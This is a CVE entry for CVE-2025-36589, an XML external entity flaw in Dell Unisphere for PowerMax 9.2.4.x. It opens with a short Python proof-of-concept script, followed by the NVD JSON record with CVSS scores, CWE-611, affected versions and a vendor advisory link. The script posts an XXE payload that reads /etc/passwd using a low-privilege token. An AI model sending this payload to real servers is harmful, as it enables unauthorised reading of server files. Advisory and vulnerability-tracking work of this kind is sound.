CVE-2025-36589

import requests import xml.etree.ElementTree as ET # CVE-2025-36589 XXE PoC for Dell Unisphere for PowerMax target_url = "https://<target>/api/v1/endpoint" # XXE payload to read /etc/passwd xxe_payload = '''<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root> <data>&xxe;</data> </root>''' headers = { "Content-Type": "application/xml", "Authorization": "Bearer <low_privilege_token>" } try: response = requests.post(target_url, data=xxe_payload, headers=headers, timeout=10) print(f"Status: {response.status_code}") print(f"Response: {response.text}") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2025-36589", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:43.780", "lastModified": "2026-01-22T20:44:14.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Unisphere for PowerMax, version(s) 9.2.4.x, contain(s) an Improper Restriction of XML External Entity Reference vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access to data and resources outside of the intended sphere of control."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:unisphere_for_powermax:9.2.4.18:*:*:*:*:*:*:*", "matchCriteriaId": "91E090BB-DB5B-428A-86E5-CD435AEF6360"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:unisphere_for_powermax_virtual_appliance:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.4.17", "versionEndExcluding": "9.2.4.19", "matchCriteriaId": "51C6E69D-6294-4181-BF67-CEE8075371FA"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000402262/dsa-2025-425-dell-powermaxos-dell-powermax-eem-dell-unisphere-for-powermax-dell-unisphere-for-powermax-virtual-appliance-dell-unisphere-360-dell-solutions-enabler-virtual-appliance-security-update-for-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}